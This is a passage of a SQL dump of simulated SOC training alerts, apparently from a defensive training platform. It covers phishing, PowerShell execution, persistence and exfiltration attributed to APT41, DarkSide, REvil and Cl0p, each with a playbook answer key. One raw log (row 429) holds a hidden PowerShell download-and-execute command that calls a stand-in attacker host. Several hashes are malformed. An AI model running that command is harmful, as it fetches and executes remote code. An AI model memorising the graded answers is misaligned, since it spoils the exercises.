'{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known APT41 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalLogs\",\"verdict\":\"internal\",\"details\":\"Critical system targeted for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalLogs\",\"verdict\":\"suspicious\",\"details\":\"Potentially compromised account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b6a9e7d3c569a7b9d8970e1ab5ec9a8f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with APT41 lateral movement tools.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"APT41_Tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareDB\",\"verdict\":\"malicious\",\"details\":\"APT41 malicious tool for network penetration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NULL', 1, 0, NULL), (417, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP)', 'In the final stage, the attackers attempt to exfiltrate valuable data to an external server, intending to use it for espionage purposes or to sell on the black market.', 'Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"185.92.220.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"user\":\"jdoe\",\"file_name\":\"confidential_report.pdf\",\"file_hash\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"action\":\"blocked\",\"alert_id\":\"DLPA123456\",\"tool_used\":\"CCleaner Supply Chain\",\"severity\":\"High\"}', '2026-01-04 04:11:48', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known exfiltration server used by APT41.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in the data exfiltration attempt.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash associated with unauthorized data transfer attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (418, 'Phishing Email Detected', 'medium', 'Email Gateway Logs', 'A phishing email was detected originating from a known malicious IP address, targeting employees to harvest credentials. The email contains a suspicious attachment and a link to a phishing site.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.45\",\"email_subject\":\"Urgent: Account Verification Required\",\"from_address\":\"support@secure-mail.com\",\"to_address\":\"john.doe@company.com\",\"attachment_name\":\"invoice_0923.docx\",\"attachment_hash\":\"3f9d4ff4e12a3e47a9f7b1c256b4c033\",\"phishing_url\":\"http://malicious-verify-login.com\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36\"}', '2026-01-04 04:13:57', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known phishing IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Company employee workstation\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f9d4ff4e12a3e47a9f7b1c256b4c033\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected in multiple AV engines\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-verify-login.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenPhish\",\"verdict\":\"malicious\",\"details\":\"Active phishing site\"}},{\"id\":\"artifact_5\",\"type\":\"email\",\"value\":\"support@secure-mail.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation\",\"verdict\":\"suspicious\",\"details\":\"Spoofed email address\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"invoice_0923.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Analysis\",\"verdict\":\"malicious\",\"details\":\"Contains macro with credential-stealing capabilities\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL), (419, 'Malware Execution Alert', 'high', 'Endpoint Detection and Response (EDR)', 'The threat actors have successfully deployed malware on the compromised system to execute code that establishes a foothold within the network. This step follows the acquisition of valid credentials.', 'Execution', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-18T14:22:35Z\",\"event_type\":\"execution\",\"source\":\"EDR\",\"host_ip\":\"192.168.1.15\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\\\Temp\\\\malicious.ps1\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"username\":\"jdoe\",\"attacker_ip\":\"203.0.113.89\"}', '2026-01-04 04:13:57', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"public_records\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with previous attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Malware hash identified in multiple threat databases.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"malicious\",\"details\":\"Script used to establish foothold within the network.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_records\",\"verdict\":\"suspicious\",\"details\":\"User account used for unauthorized execution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (420, 'Persistence Mechanism Detected', 'high', 'System Logs', 'A persistence mechanism associated with DarkSide has been detected, indicating an attempt to maintain access to the compromised system. The mechanism involves suspicious registry modifications and the presence of known malicious binaries.', 'Persistence', 'T1050 - New Service', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:32:45Z\",\"host_ip\":\"192.168.1.105\",\"user\":\"john_doe\",\"event_id\":7045,\"event_source\":\"Service Control Manager\",\"service_name\":\"DarkSideService\",\"service_path\":\"C:\\\\Windows\\\\System32\\\\darkside.exe\",\"md5_hash\":\"ae67f4c3d2b5e8a9f5b3d4f0e3a1c9d8\",\"attacker_ip\":\"203.0.113.45\",\"registry_change\":{\"key\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"DarkSideService\",\"value_data\":\"C:\\\\Windows\\\\System32\\\\darkside.exe\"}}', '2026-01-04 04:13:57', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP address used by DarkSide APT group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"ae67f4c3d2b5e8a9f5b3d4f0e3a1c9d8\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus total\",\"verdict\":\"malicious\",\"details\":\"MD5 hash associated with DarkSide malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"darkside.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Executable linked to DarkSide operations.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"clean\",\"details\":\"User associated with the compromised system.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL); INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES (421, 'Unauthorized Admin Access', 'high', 'Network Traffic Analysis', 'The attackers use escalated privileges to move laterally within the network, targeting systems that control pipeline operations. Network logs indicate unauthorized login attempts to admin accounts from suspicious external IPs.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T07:45:22Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.12\",\"username\":\"admin_user\",\"success\":true,\"action\":\"login\",\"description\":\"Successful login using administrative credentials from external IP.\",\"alert\":\"Unauthorized Admin Access Detected\",\"hashes\":{\"sha256\":\"d2d2d2d2b2b2c2c2f2f2g2g2h2h2i2i2j2j2k2k2l2l2m2m2n2n2o2o2p2p2\"}}', '2026-01-04 04:13:57', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"Account used for unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d2d2d2d2b2b2c2c2f2f2g2g2h2h2i2i2j2j2k2k2l2l2m2m2n2n2o2o2p2p2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified in connection with APT attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NULL', 1, 0, NULL), (422, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP) Systems', 'In the final stage, DarkSide attempts to exfiltrate sensitive operational data, which could be used for ransom or sold on the black market. The DLP system detected an unauthorized data transfer to an external IP address.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"file_hash\":\"f3b9e2c6f8d3c2d7f8c3b3e5a5e6d7c8\",\"filename\":\"OperationalData_Backup.zip\",\"protocol\":\"HTTPS\",\"action\":\"blocked\",\"alert_id\":\"DLPS-5678-EXF\"}', '2026-01-04 04:13:57', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known IP address used by DarkSide for data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f3b9e2c6f8d3c2d7f8c3b3e5a5e6d7c8\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with suspicious data exfiltration files.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"OperationalData_Backup.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Filename suggests sensitive data being exfiltrated.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"clean\",\"details\":\"User account potentially compromised for data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (423, 'Unusual Phishing Email Detected', 'medium', 'Email Gateway Logs', 'An employee received a phishing email with a malicious attachment, indicative of REvil\'s initial access strategy. The email originated from a suspicious IP and contained a known malicious file hash.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-17T08:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"sender_email\":\"attacker@maliciousdomain.com\",\"recipient_email\":\"j.doe@company.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":{\"filename\":\"invoice_update.docm\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"},\"user\":\"j.doe\",\"message_id\":\"<20231017083245.123456@maliciousdomain.com>\"}', '2026-01-04 04:25:30', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email domain flagged for sending phishing emails.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious document used by REvil.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"invoice_update.docm\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename pattern common in phishing attachments.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Internal employee targeted by phishing attempt.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL), (424, 'Suspicious PowerShell Script Execution', 'high', 'Endpoint Detection and Response (EDR) System', 'A PowerShell script was executed on the endpoint, potentially indicating malicious activity consistent with REvil ransomware tactics. The script was observed executing commands to download additional payloads from a known malicious IP.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T13:45:27Z\",\"event_id\":\"4624\",\"computer_name\":\"DESKTOP-3FQ7K9R\",\"user\":\"johndoe\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"command_line\":\"powershell -NoProfile -ExecutionPolicy Bypass -File C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.ps1\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":\"443\",\"filename\":\"malicious_script.ps1\"}', '2026-01-04 04:25:30', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with REvil ransomware\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash associated with REvil ransomware payload\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual script execution in user temp directory\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"johndoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Known user account on the network\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (425, 'Persistence Mechanism Established', 'high', 'Registry Changes Monitoring', 'The REvil ransomware has established persistence by modifying registry keys, ensuring they retain access after a system reboot. This action is indicative of a sophisticated attack aimed at maintaining long-term access to the compromised system.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T02:15:45Z\",\"event_id\":\"4624\",\"event_type\":\"Registry Change Detected\",\"host\":\"compromised-host.local\",\"user\":\"administrator\",\"ip_address\":\"192.168.1.10\",\"external_ip\":\"185.92.220.65\",\"registry_key\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\maliciousApp\",\"registry_value\":\"C:\\\\ProgramData\\\\REvil\\\\malicious.exe\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"description\":\"Registry key modified to establish persistence by REvil malware.\"}', '2026-01-04 04:25:33', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.92.220.65\",\"is_critical\":true,\"osint_result\":{\"source\":\"malicious_ip_database\",\"verdict\":\"malicious\",\"details\":\"Identified as a command and control server related to REvil activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_hash_registry\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with REvil ransomware executable.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (426, 'Lateral Movement via RDP', 'high', 'Network Traffic Analysis', 'Anomalous RDP connection detected from a known malicious IP address using stolen credentials. This activity matches the lateral movement tactics commonly associated with the REvil group, indicating an attempt to expand access within the network.', 'Lateral Movement', 'T1021.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"src_ip\":\"185.92.220.25\",\"dest_ip\":\"192.168.1.10\",\"username\":\"j.doe\",\"login_method\":\"RDP\",\"event_id\":\"4624\",\"event_type\":\"Logon\",\"logon_type\":\"10\",\"status\":\"Success\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"filename\":\"malicious_rdp_session.exe\"}', '2026-01-04 04:25:33', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with REvil operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Destination IP within internal network\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Valid user account within the organization\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash for malicious RDP session file\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NULL', 1, 0, NULL), (427, 'Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) System', 'The DLP system detected a large volume of sensitive data being transferred to an unauthorized external IP address. The data includes financial documents and proprietary design files. The activity is consistent with the REvil attack chain, indicating a potential preparation for ransomware deployment.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T16:42:00Z\",\"event_id\":\"EXFIL-2023-0005\",\"source_ip\":\"192.168.4.25\",\"destination_ip\":\"203.0.113.45\",\"file_hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"file_name\":\"financial_report_q3_2023.xlsx\",\"username\":\"jdoe\",\"action\":\"exfiltration\",\"protocol\":\"HTTPS\",\"data_size\":\"2GB\",\"malware_association\":\"REvil\",\"risk_score\":85}', '2026-01-04 04:25:33', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of user\'s workstation\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with REvil exfiltration tools\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_report_q3_2023.xlsx\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"clean\",\"details\":\"Standard financial document\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User of the affected machine\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (428, 'Spear Phishing Email Detected', 'high', 'Email Gateway Logs', 'A spear phishing email has been detected targeting key employees, originating from a known malicious IP address associated with the Cl0p ransomware group. The email contains a crafted attachment designed to deploy an initial payload and harvest credentials.', 'Initial Access', 'T1566.001', 1, 'investigating', 49, '{\"timestamp\":\"2023-10-12T08:30:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.23\",\"recipient\":\"j.doe@company.com\",\"sender\":\"support@security-update.com\",\"subject\":\"Urgent: Security Update Required\",\"attachment\":\"Security_Update.exe\",\"attachment_hash\":\"f2a6b7a8c9d4e6f8b5c4d6e7f8a9b0c1\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"message_id\":\"<20231012083000.123456@company.com>\"}', '2026-01-04 04:38:04', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with Cl0p ransomware group.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"support@security-update.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Phishing Database\",\"verdict\":\"malicious\",\"details\":\"Email used in prior spear phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2a6b7a8c9d4e6f8b5c4d6e7f8a9b0c1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Cl0p payload.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"j.doe@company.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Employee email address.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (429, 'Malicious Script Execution', 'high', 'Endpoint Detection and Response (EDR)', 'A malicious script was executed on the endpoint to download and execute additional payloads, establishing a backdoor for persistent control. This follows a successful phishing attack.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:33Z\",\"event_type\":\"process_creation\",\"host_ip\":\"10.12.34.56\",\"username\":\"johndoe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.site/payload.ps1\')\",\"file_hash\":\"ebd0c9b9a1d3b3c4f5a6d7e8f9a0b1c2d3e4f5g6h7i8j9k0\",\"attacker_ip\":\"203.0.113.45\",\"file_name\":\"payload.ps1\",\"process_id\":4521}', '2026-01-04 04:38:04', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat 